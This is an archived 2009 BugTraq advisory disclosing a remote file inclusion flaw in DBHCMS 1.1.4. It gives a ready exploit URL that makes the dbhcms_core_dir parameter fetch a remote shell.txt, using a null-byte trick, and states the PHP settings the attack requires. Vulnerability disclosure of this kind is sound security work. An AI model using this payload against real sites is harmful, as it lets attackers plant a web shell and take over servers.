BugTraq
DBHCMS Web Content Management System v1.1.4 RFI Vulnerability Dec 28 2009 06:40AM
info securitylab ir
######################### Securitylab.ir ########################

# Application Info:

# Name: DBHCMS Web Content Management System

# Version: 1.1.4

# Download: :(

#################################################################

# Discoverd By: Securitylab.ir

# Website: http://Securitylab.ir

# Contacts: admin[at]securitylab.ir & k4mr4n_st (at) yahoo (dot) com [email concealed]

#################################################################

# Vulnerability Info:

# Type: RFI (Remote File Inclusion)

# Risk: High

#===========================================================

# http://site.com/index.php?dbhcms_core_dir=http://site.com/shell.txt%00

# Need: register_globals = ON and allow_url_include = ON

#===========================================================

# Securitylab Security Research Team

###################################################################

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus